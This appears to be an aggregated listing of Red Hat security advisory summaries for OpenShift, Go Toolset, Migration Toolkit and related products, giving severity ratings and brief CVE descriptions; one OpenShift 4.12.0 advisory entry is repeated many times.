Red Hat OpenShift Container Platform release 4.9.55 is now available with updates to packages and images that fix several bugs and add enhancements. Red Hat Product Security has rated this update as having a security impact of Critical. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-4238: A flaw was found in goutils where randomly generated alphanumeric strings contain significantly less entropy than expected. Both the `RandomAlphaNumeric` and `CryptoRandomAlphaNumeric` functions always return strings containing at least one digit from 0 to 9. This issue ...

Red Hat Security Advisory 2023-0708-01

Red Hat Security Advisory 2023-0708-01 - Red Hat OpenShift Serverless Client kn 1.27.0 provides a CLI to interact with Red Hat OpenShift Serverless 1.27.0. The kn CLI is delivered as an RPM package for installation on RHEL platforms, and as binaries for non-Linux platforms.

Red Hat Security Advisory 2023-0709-01

Red Hat Security Advisory 2023-0709-01 - Version 1.27.0 of the OpenShift Serverless Operator is supported on Red Hat OpenShift Container Platform versions 4.8, 4.9, 4.10, 4.11 and 4.12. This release includes security and bug fixes, and enhancements.

Red Hat Security Advisory 2023-0693-01

Red Hat Security Advisory 2023-0693-01 - The Migration Toolkit for Containers enables you to migrate Kubernetes resources, persistent volume data, and internal container images between OpenShift Container Platform clusters, using the MTC web console or the Kubernetes API. Issues addressed include a denial of service vulnerability.

RHSA-2023:0693: Red Hat Security Advisory: Migration Toolkit for Containers (MTC) 1.7.7 security and bug fix update

The Migration Toolkit for Containers (MTC) 1.7.7 is now available. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-43138: A vulnerability was found in the async package. This flaw allows a malicious user to obtain privileges via the mapValues() method. * CVE-2022-2879: A flaw was found in the golang package, where archive/tar Reader.Read does not set a limit on the maximum size of file headers. After fixing, Reader.Read limits the maximum size of header blocks to 1 MiB. This flaw a...

Red Hat Security Advisory 2023-0569-01

Red Hat Security Advisory 2023-0569-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the container images for Red Hat OpenShift Container Platform 4.12.2. Issues addressed include a denial of service vulnerability.

Red Hat Security Advisory 2023-0570-01

Red Hat Security Advisory 2023-0570-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the RPM packages for Red Hat OpenShift Container Platform 4.12.2. Issues addressed include a denial of service vulnerability.

RHSA-2023:0569: Red Hat Security Advisory: OpenShift Container Platform 4.12.2 security update

Red Hat OpenShift Container Platform release 4.12.2 is now available with updates to packages and images that fix several bugs and add enhancements. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-4235: A flaw was found in go-yaml. This issue occurs due to unbounded alias chasing, where a maliciously crafted YAML file can cause the system to consume significant system resources. If parsing user input, this may be used as a denial of service vector. * CVE-2021-4238: A f...

RHSA-2023:0570: Red Hat Security Advisory: OpenShift Container Platform 4.12.2 security update

Red Hat OpenShift Container Platform release 4.12.2 is now available with updates to packages and images that fix several bugs and add enhancements. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-4235: A flaw was found in go-yaml. This issue occurs due to unbounded alias chasing, where a maliciously crafted YAML file can cause the system to consume significant system resources. If parsing user input, this may be used as a denial of service vector.

RHSA-2023:0630: Red Hat Security Advisory: Red Hat Advanced Cluster Management 2.7.0 security and bug fix updates

Red Hat Advanced Cluster Management for Kubernetes 2.7.0 General Availability release images, which provide security updates and fix bugs. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE links in the References section. This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-3517: A vulnerability was found in the nodejs-minimatch package. This flaw allows a Regular Expression Denial of Service (ReDoS) when calling the braceExpand function with specific arguments, resulting in a Denial of Service. * CVE-2022-30629: A flaw was found in the crypto/tls golang pa...

CSAF VEX documents now generally available

In June 2022, we started publishing CSAF advisory files (https://www.redhat.com/en/blog/common-security-advisory-framework-csaf-beta-files-now-available) in their beta format, hoping to gather feedback from customers, partners, and the security community. With your input we worked on improving the final version of the files, and they are now ready for public consumption in production use cases at https://access.redhat.com/security/data/csaf/v2/advisories/

Red Hat Security Advisory 2023-0542-01

Red Hat Security Advisory 2023-0542-01 - Red Hat OpenShift Service Mesh is the Red Hat distribution of the Istio service mesh project, tailored for installation into an on-premise OpenShift Container Platform installation. This advisory covers container images for the release. Issues addressed include denial of service and spoofing vulnerabilities.

RHSA-2023:0542: Red Hat Security Advisory: Red Hat OpenShift Service Mesh 2.3.1 Containers security update

Red Hat OpenShift Service Mesh 2.3.1 Containers. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-4238: goutils: RandomAlphaNumeric and CryptoRandomAlphaNumeric are not as random as they should be * CVE-2022-2879: golang: archive/tar: unbounded memory consumption when reading headers * CVE-2022-2880: golang: net/http/httputil: ReverseProxy should not forward unparseable query parameters * CVE-2022-3962: kiali: error message spoofing in kiali UI * CVE-2022-27664: golang: ...

Red Hat Security Advisory 2023-0468-01

Red Hat Security Advisory 2023-0468-01 - Red Hat Openshift GitOps is a declarative way to implement continuous deployment for cloud native applications.

Red Hat Security Advisory 2023-0467-01

Red Hat Security Advisory 2023-0467-01 - Red Hat Openshift GitOps is a declarative way to implement continuous deployment for cloud native applications. Issues addressed include a bypass vulnerability.

RHSA-2023:0470: Red Hat Security Advisory: Migration Toolkit for Runtimes security update

An update is now available for Migration Toolkit for Runtimes (v1.0.1). Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-42920: Apache-Commons-BCEL: arbitrary bytecode produced via out-of-bounds writing

RHSA-2023:0467: Red Hat Security Advisory: Red Hat OpenShift GitOps security update

An update is now available for Red Hat OpenShift GitOps 1.7. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2023-22482: ArgoCD: JWT audience claim is not verified * CVE-2023-22736: argocd: Controller reconciles apps outside configured namespaces when sharding is enabled

Red Hat Security Advisory 2023-0446-01

Red Hat Security Advisory 2023-0446-01 - Go Toolset provides the Go programming language tools and libraries. Go is alternatively known as golang.

Red Hat Security Advisory 2023-0445-01

Red Hat Security Advisory 2023-0445-01 - Go Toolset provides the Go programming language tools and libraries. Go is alternatively known as golang.

RHSA-2023:0446: Red Hat Security Advisory: go-toolset:rhel8 security and bug fix update

An update for the go-toolset:rhel8 module is now available for Red Hat Enterprise Linux 8. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-2879: golang: archive/tar: unbounded memory consumption when reading headers * CVE-2022-2880: golang: net/http/httputil: ReverseProxy should not forward unparseable query parameters * CVE-2022-41715: golang: regexp/syntax: limit memory used by parsing regexps

RHSA-2023:0445: Red Hat Security Advisory: go-toolset-1.18 security update

An update for go-toolset-1.18 and go-toolset-1.18-golang is now available for Red Hat Developer Tools. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-2879: golang: archive/tar: unbounded memory consumption when reading headers * CVE-2022-2880: golang: net/http/httputil: ReverseProxy should not forward unparseable query parameters * CVE-2022-41715: golang: regexp/syntax: limit memory used by parsing regexps

Red Hat Security Advisory 2023-0241-01

Red Hat Security Advisory 2023-0241-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the container images for Red Hat OpenShift Container Platform 4.10.50.

RHSA-2023:0241: Red Hat Security Advisory: OpenShift Container Platform 4.10.50 bug and security update

Red Hat OpenShift Container Platform release 4.10.50 is now available with updates to packages and images that fix several bugs. Red Hat Product Security has rated this update as having a security impact of Low. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2023-0296: openshift: etcd grpc-proxy vulnerable to The Birthday attack against 64-bit block cipher

RHSA-2023:0328: Red Hat Security Advisory: go-toolset and golang security and bug fix update

An update for go-toolset and golang is now available for Red Hat Enterprise Linux 9. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-2879: golang: archive/tar: unbounded memory consumption when reading headers * CVE-2022-2880: golang: net/http/httputil: ReverseProxy should not forward unparseable query parameters * CVE-2022-41715: golang: regexp/syntax: limit memory used by parsing regexps

Red Hat Security Advisory 2023-0069-01

Red Hat Security Advisory 2023-0069-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the container images for Red Hat OpenShift Container Platform 4.11.24.

Red Hat Security Advisory 2023-0264-01

Red Hat Security Advisory 2023-0264-01 - An update for Logging Subsystem (5.6.0) is now available for Red Hat OpenShift Container Platform. Issues addressed include a denial of service vulnerability.

RHSA-2023:0069: Red Hat Security Advisory: OpenShift Container Platform 4.11.24 bug and security update

Red Hat OpenShift Container Platform release 4.11.24 is now available with updates to packages and images that fix several bugs. Red Hat Product Security has rated this update as having a security impact of Low. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2023-0296: openshift: etcd grpc-proxy vulnerable to The Birthday attack against 64-bit block cipher

RHSA-2023:0264: Red Hat Security Advisory: Red Hat OpenShift (Logging Subsystem) security update

An update for Logging Subsystem (5.6.0) is now available for Red Hat OpenShift Container Platform. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2020-36518: jackson-databind: denial of service via a large depth of nested objects * CVE-2022-2879: golang: archive/tar: unbounded memory consumption when reading headers * CVE-2022-2880: golang: net/http/httputil: ReverseProxy should not forward unparseable query parameters * CVE-2022-27664: golang: net/http: handle server error...

Red Hat Security Advisory 2022-7398-02

Red Hat Security Advisory 2022-7398-02 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the RPM packages for Red Hat OpenShift Container Platform 4.12.0. Issues addressed include a denial of service vulnerability.

CVE-2023-0296: Invalid Bug ID

The Birthday attack against 64-bit block ciphers flaw (CVE-2016-2183) was reported for the health check port (9979) on the etcd grpc-proxy component. Even though CVE-2016-2183 has been fixed in the etcd components, opening a new port (9979) on etcd grpc-proxy was necessary to enable periodic health checks from kubelet, so this port might be considered still vulnerable to the same type of vulnerability. The health checks on etcd grpc-proxy do not carry sensitive data (only metrics data), therefore the potential impact of this vulnerability is minimal. CVE-2023-0296 has been assigned to this issue to track the permanent fix in the etcd component.

RHSA-2022:7399: Red Hat Security Advisory: OpenShift Container Platform 4.12.0 bug fix and security update

Red Hat OpenShift Container Platform release 4.12.0 is now available with updates to packages and images that fix several bugs and add enhancements. This release includes a security update for Red Hat OpenShift Container Platform 4.12. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-38561: golang: out-of-bounds read in golang.org/x/text/language leads to DoS * CVE-2022-1705: golang: net/http: improper sanitization of Transfer-Encoding header * CVE-2022-2879: golang: arc...

RHSA-2022:7399: Red Hat Security Advisory: OpenShift Container Platform 4.12.0 bug fix and security update

Red Hat OpenShift Container Platform release 4.12.0 is now available with updates to packages and images that fix several bugs and add enhancements. This release includes a security update for Red Hat OpenShift Container Platform 4.12. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-38561: golang: out-of-bounds read in golang.org/x/text/language leads to DoS * CVE-2022-1705: golang: net/http: improper sanitization of Transfer-Encoding header * CVE-2022-2879: golang: arc...

RHSA-2022:7399: Red Hat Security Advisory: OpenShift Container Platform 4.12.0 bug fix and security update

Red Hat OpenShift Container Platform release 4.12.0 is now available with updates to packages and images that fix several bugs and add enhancements. This release includes a security update for Red Hat OpenShift Container Platform 4.12. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-38561: golang: out-of-bounds read in golang.org/x/text/language leads to DoS * CVE-2022-1705: golang: net/http: improper sanitization of Transfer-Encoding header * CVE-2022-2879: golang: arc...

RHSA-2022:7399: Red Hat Security Advisory: OpenShift Container Platform 4.12.0 bug fix and security update

Red Hat OpenShift Container Platform release 4.12.0 is now available with updates to packages and images that fix several bugs and add enhancements. This release includes a security update for Red Hat OpenShift Container Platform 4.12. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-38561: golang: out-of-bounds read in golang.org/x/text/language leads to DoS * CVE-2022-1705: golang: net/http: improper sanitization of Transfer-Encoding header * CVE-2022-2879: golang: arc...

RHSA-2022:7399: Red Hat Security Advisory: OpenShift Container Platform 4.12.0 bug fix and security update

Red Hat OpenShift Container Platform release 4.12.0 is now available with updates to packages and images that fix several bugs and add enhancements. This release includes a security update for Red Hat OpenShift Container Platform 4.12. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-38561: golang: out-of-bounds read in golang.org/x/text/language leads to DoS * CVE-2022-1705: golang: net/http: improper sanitization of Transfer-Encoding header * CVE-2022-2879: golang: arc...

RHSA-2022:7399: Red Hat Security Advisory: OpenShift Container Platform 4.12.0 bug fix and security update

Red Hat OpenShift Container Platform release 4.12.0 is now available with updates to packages and images that fix several bugs and add enhancements. This release includes a security update for Red Hat OpenShift Container Platform 4.12. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-38561: golang: out-of-bounds read in golang.org/x/text/language leads to DoS * CVE-2022-1705: golang: net/http: improper sanitization of Transfer-Encoding header * CVE-2022-2879: golang: arc...

RHSA-2022:7399: Red Hat Security Advisory: OpenShift Container Platform 4.12.0 bug fix and security update

Red Hat OpenShift Container Platform release 4.12.0 is now available with updates to packages and images that fix several bugs and add enhancements. This release includes a security update for Red Hat OpenShift Container Platform 4.12. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-38561: golang: out-of-bounds read in golang.org/x/text/language leads to DoS * CVE-2022-1705: golang: net/http: improper sanitization of Transfer-Encoding header * CVE-2022-2879: golang: arc...

RHSA-2022:7399: Red Hat Security Advisory: OpenShift Container Platform 4.12.0 bug fix and security update

Red Hat OpenShift Container Platform release 4.12.0 is now available with updates to packages and images that fix several bugs and add enhancements. This release includes a security update for Red Hat OpenShift Container Platform 4.12. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-38561: golang: out-of-bounds read in golang.org/x/text/language leads to DoS * CVE-2022-1705: golang: net/http: improper sanitization of Transfer-Encoding header * CVE-2022-2879: golang: arc...

RHSA-2022:7399: Red Hat Security Advisory: OpenShift Container Platform 4.12.0 bug fix and security update

Red Hat OpenShift Container Platform release 4.12.0 is now available with updates to packages and images that fix several bugs and add enhancements. This release includes a security update for Red Hat OpenShift Container Platform 4.12. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-38561: golang: out-of-bounds read in golang.org/x/text/language leads to DoS * CVE-2022-1705: golang: net/http: improper sanitization of Transfer-Encoding header * CVE-2022-2879: golang: arc...

RHSA-2022:7399: Red Hat Security Advisory: OpenShift Container Platform 4.12.0 bug fix and security update

Red Hat OpenShift Container Platform release 4.12.0 is now available with updates to packages and images that fix several bugs and add enhancements. This release includes a security update for Red Hat OpenShift Container Platform 4.12. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-38561: golang: out-of-bounds read in golang.org/x/text/language leads to DoS * CVE-2022-1705: golang: net/http: improper sanitization of Transfer-Encoding header * CVE-2022-2879: golang: arc...

RHSA-2022:7399: Red Hat Security Advisory: OpenShift Container Platform 4.12.0 bug fix and security update

Red Hat OpenShift Container Platform release 4.12.0 is now available with updates to packages and images that fix several bugs and add enhancements. This release includes a security update for Red Hat OpenShift Container Platform 4.12. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-38561: golang: out-of-bounds read in golang.org/x/text/language leads to DoS * CVE-2022-1705: golang: net/http: improper sanitization of Transfer-Encoding header * CVE-2022-2879: golang: arc...

RHSA-2022:7399: Red Hat Security Advisory: OpenShift Container Platform 4.12.0 bug fix and security update

Red Hat OpenShift Container Platform release 4.12.0 is now available with updates to packages and images that fix several bugs and add enhancements. This release includes a security update for Red Hat OpenShift Container Platform 4.12. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-38561: golang: out-of-bounds read in golang.org/x/text/language leads to DoS * CVE-2022-1705: golang: net/http: improper sanitization of Transfer-Encoding header * CVE-2022-2879: golang: arc...

RHSA-2022:7399: Red Hat Security Advisory: OpenShift Container Platform 4.12.0 bug fix and security update

Red Hat OpenShift Container Platform release 4.12.0 is now available with updates to packages and images that fix several bugs and add enhancements. This release includes a security update for Red Hat OpenShift Container Platform 4.12. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-38561: golang: out-of-bounds read in golang.org/x/text/language leads to DoS * CVE-2022-1705: golang: net/http: improper sanitization of Transfer-Encoding header * CVE-2022-2879: golang: arc...

RHSA-2022:7399: Red Hat Security Advisory: OpenShift Container Platform 4.12.0 bug fix and security update

Red Hat OpenShift Container Platform release 4.12.0 is now available with updates to packages and images that fix several bugs and add enhancements. This release includes a security update for Red Hat OpenShift Container Platform 4.12. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-38561: golang: out-of-bounds read in golang.org/x/text/language leads to DoS * CVE-2022-1705: golang: net/http: improper sanitization of Transfer-Encoding header * CVE-2022-2879: golang: arc...
RHSA-2022:7401: Red Hat Security Advisory: OpenShift Container Platform 4.12 security update

Red Hat OpenShift Container Platform release 4.12 is now available with updates to packages and images that fix several bugs and add enhancements. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.

Related CVEs:
* CVE-2021-38561: golang: out-of-bounds read in golang.org/x/text/language leads to DoS
* CVE-2022-27191: golang: crash in a golang.org/x/crypto/ssh server

RHSA-2022:7398: Red Hat Security Advisory: OpenShift Container Platform 4.12.0 packages and security update

Red Hat OpenShift Container Platform release 4.12.0 is now available with updates to packages and images that fix several bugs and add enhancements. This release includes a security update for Red Hat OpenShift Container Platform 4.12. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.

Related CVEs:
* CVE-2021-4235: go-yaml: Denial of Service in go-yaml
* CVE-2022-2880: golang: net/http/httputil: ReverseProxy should not forward unparseable query parameters
* CVE-2022-2995: cri-o: incorrect handlin...

Red Hat Security Advisory 2023-0096-01

Red Hat Security Advisory 2023-0096-01 - D-Bus is a system for sending messages between applications. It is used both for the system-wide message bus service, and as a per-user-login-session messaging facility.

GHSA-r88r-gmrh-7j83: YAML Go package vulnerable to denial of service

Due to unbounded alias chasing, a maliciously crafted YAML file can cause the system to consume significant system resources. If parsing user input, this may be used as a denial of service vector.

CVE-2021-4235: Add logic to catch cases of alias abuse. · go-yaml/yaml@bb4e33b

Due to unbounded alias chasing, a maliciously crafted YAML file can cause the system to consume significant system resources. If parsing user input, this may be used as a denial of service vector.

CVE-2022-42898: Fix integer overflows in PAC parsing · krb5/krb5@ea92d2f

PAC parsing in MIT Kerberos 5 (aka krb5) before 1.19.4 and 1.20.x before 1.20.1 has integer overflows that may lead to remote code execution (in KDC, kadmind, or a GSS or Kerberos application server) on 32-bit platforms (which have a resultant heap-based buffer overflow), and cause a denial of service on other platforms. This occurs in krb5_pac_parse in lib/krb5/krb/pac.c. Heimdal before 7.7.1 has "a similar bug."

Red Hat Security Advisory 2022-8893-01

Red Hat Security Advisory 2022-8893-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the container images for Red Hat OpenShift Container Platform 4.11.20.

RHSA-2022:8893: Red Hat Security Advisory: OpenShift Container Platform 4.11.20 security update

Red Hat OpenShift Container Platform release 4.11.20 is now available with updates to packages and images that fix several bugs and add enhancements. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.

Related CVEs:
* CVE-2022-27191: golang: crash in a golang.org/x/crypto/ssh server

RHSA-2022:9047: Red Hat Security Advisory: Migration Toolkit for Containers (MTC) 1.7.6 security and bug fix update

The Migration Toolkit for Containers (MTC) 1.7.6 is now available. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.

Related CVEs:
* CVE-2022-1705: golang: net/http: improper sanitization of Transfer-Encoding header
* CVE-2022-1962: golang: go/parser: stack exhaustion in all Parse* functions
* CVE-2022-28131: golang: encoding/xml: stack exhaustion in Decoder.Skip
* CVE-2022-30629: golang: crypto/tls: session tickets lack random ticket_age_add
* CVE-2022-30630: golang: io/fs: stack exhaustion in G...

Red Hat Security Advisory 2022-8977-01

Red Hat Security Advisory 2022-8977-01 - D-Bus is a system for sending messages between applications. It is used both for the system-wide message bus service, and as a per-user-login-session messaging facility.

Red Hat Security Advisory 2022-8938-01

Red Hat Security Advisory 2022-8938-01 - Version 1.26.0 of the OpenShift Serverless Operator is supported on Red Hat OpenShift Container Platform versions 4.8, 4.9, 4.10, and 4.11. This release includes security and bug fixes, and enhancements.

